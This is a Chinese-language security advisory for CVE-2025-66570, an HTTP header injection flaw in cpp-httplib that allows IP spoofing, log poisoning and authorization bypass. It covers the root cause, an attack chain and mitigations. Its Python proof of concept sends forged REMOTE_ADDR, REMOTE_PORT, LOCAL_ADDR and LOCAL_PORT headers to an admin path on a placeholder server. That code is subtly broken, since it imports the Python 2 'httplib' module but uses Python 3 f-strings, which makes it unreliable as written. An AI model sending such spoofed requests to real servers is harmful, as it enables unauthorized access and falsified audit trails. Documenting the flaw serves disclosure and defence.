CVE-2025-66570: cpp-httplib HTTP头注入漏洞允许IP欺骗和授权绕过

漏洞信息

漏洞编号

CVE-2025-66570

漏洞类型

HTTP头注入/Header Injection

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

cpp-httplib

漏洞概述

CVE-2025-66570是cpp-httplib库中的一个严重安全漏洞，CVSS评分高达10.0。该漏洞影响0.27.0之前的所有版本，允许攻击者通过注入特定HTTP头来操纵服务器可见的元数据、日志记录和授权决策。攻击者可以注入名为REMOTE_ADDR、REMOTE_PORT、LOCAL_ADDR、LOCAL_PORT的头部，这些头部通过read_headers()函数被解析到请求头multimap中。由于Request::get_header_value返回头部键的第一个条目，且客户端提供的头部在服务器插入的头部之前被解析，因此下游代码可能无意中使用了攻击者控制的值。此漏洞可能被用于IP欺骗、日志污染和通过头部隐藏实现授权绕过，对系统安全构成严重威胁。

技术细节

该漏洞的根本原因在于cpp-httplib的HTTP头解析逻辑存在缺陷。在httplib.h的read_headers()函数中，headers.emplace()将攻击者可控的HTTP头添加到Request.headers multimap中。随后在Server::process_request中，服务器追加自己的内部元数据时使用相同的头名称，但未先清除已存在的重复项。Request::get_header_value方法返回指定头键的第一个条目（id==0），由于客户端头在服务器插入的头之前被解析，因此返回的是攻击者注入的值而非真实的服务器元数据。受影响的关键位置包括：httplib.h中的read_headers、Server::process_request、Request::get_header_value和get_header_value_u64函数，以及docker/main.cc中的get_client_ip、nginx_access_logger和nginx_error_logger函数。攻击者可通过发送包含REMOTE_ADDR等头部的HTTP请求，欺骗服务器的IP记录、日志系统和访问控制机制。

攻击链分析

STEP 1

步骤1

攻击者识别使用cpp-httplib库（<0.27.0）的目标服务器

STEP 2

步骤2

攻击者构造包含REMOTE_ADDR、REMOTE_PORT、LOCAL_ADDR、LOCAL_PORT等头部的HTTP请求

STEP 3

步骤3

服务器通过read_headers()函数将攻击者注入的头部添加到Request.headers multimap

STEP 4

步骤4

服务器在process_request中追加内部元数据，但未清除已有的重复头部

STEP 5

步骤5

下游代码调用Request::get_header_value获取这些头部的值时，返回攻击者注入的伪造值

STEP 6

步骤6

攻击者成功实现IP欺骗、日志污染或授权绕过等攻击目标

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import httplib

# CVE-2025-66570 PoC - HTTP Header Injection in cpp-httplib
# Attackers can inject REMOTE_ADDR, REMOTE_PORT, LOCAL_ADDR, LOCAL_PORT headers
# to spoof IP addresses, poison logs, or bypass authorization checks

target_host = 'target-server.com'
target_port = 80

# Create connection
conn = httplib.HTTPConnection(target_host, target_port)

# Crafted headers to inject server metadata
headers = {
    'Host': target_host,
    'User-Agent': 'Mozilla/5.0',
    # Inject headers that will be treated as server-generated metadata
    'REMOTE_ADDR': '1.2.3.4',  # Spoofed IP address
    'REMOTE_PORT': '12345',
    'LOCAL_ADDR': '10.0.0.1',
    'LOCAL_PORT': '8080',
    'X-Forwarded-For': '1.2.3.4'  # Additional spoofing vector
}

# Send malicious request
conn.request('GET', '/admin/dashboard', headers=headers)

response = conn.getresponse()
print(f'Status: {response.status}')
print(f'Response headers: {dict(response.getheaders())}')

conn.close()

# The server may use attacker-controlled values for:
# - IP-based access control decisions
# - Logging and audit trails
# - Rate limiting and throttling
# - Geo-location based restrictions

影响范围

cpp-httplib < 0.27.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在反向代理层过滤包含REMOTE_ADDR、REMOTE_PORT、LOCAL_ADDR、LOCAL_PORT等敏感头部的入站请求；2) 使用独立的连接信息追踪机制而非HTTP头；3) 加强对IP相关安全决策的二次验证；4) 监控异常的请求头部模式。建议尽快升级到0.27.0或更高版本以彻底修复此漏洞。